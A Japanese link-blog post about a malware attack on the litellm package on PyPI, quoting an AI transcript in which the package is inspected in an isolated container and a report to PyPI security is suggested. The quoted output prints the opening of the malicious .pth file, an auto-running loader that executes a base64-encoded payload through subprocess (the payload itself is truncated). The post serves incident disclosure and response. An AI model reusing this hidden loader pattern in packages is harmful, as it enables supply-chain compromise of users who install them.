スポンサー: WorkOS — エンタープライズのクライアントに販売する準備はできていますか? WorkOSで安全に構築して出荷しましょう。
2026年3月26日 - リンクブログ
LiteLLMのマルウェア攻撃への分刻みの対応(via)Callum McMahonがLiteLLMのマルウェア攻撃をPyPIに報告しました。ここで彼は、脆弱性であることを確認し、その後どうするべきかを判断するのに役立てたClaudeのトランスクリプトを共有しています。Dockerコンテナ内で悪意のあるコードを確認した後、ClaudeはPyPIのセキュリティ担当者の連絡先アドレスまで提案しました:
確認済み。今、分離されたDockerコンテナ内でPyPIから新しくダウンロードすると:
Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...")悪意のある
litellm==1.82.8は今すぐPyPIで公開中であり、litellmをインストールまたはアップグレードする誰もが感染します。これはsecurity@pypi.orgへただちに報告する必要があります。
Callumが私のclaude-code-transcriptsツールを使って、会話のトランスクリプトを公開していたのを見てうれしかったです。
最近の記事
- ClaudeスキルでStarlette 1.0を試す - 2026年3月22日
- コメントに基づいてHacker Newsユーザーをプロファイリングする - 2026年3月21日
- OpenAIがAstralを買収すること、そしてuv/ruff/tyについての考え - 2026年3月19日
これはSimon Willisonによるリンク投稿で、2026年3月26日に投稿されました。
pypi 46 security 585 ai 1934 generative-ai 1715 llms 1681 claude 264 supply-chain 14月次ブリーフィング
$10/月でスポンサーになって、今月の最も重要なLLMの動向を厳選したメールダイジェストを受け取ってください。
こちらから送る量を減らすために、支払ってください!
スポンサーになる &購読する


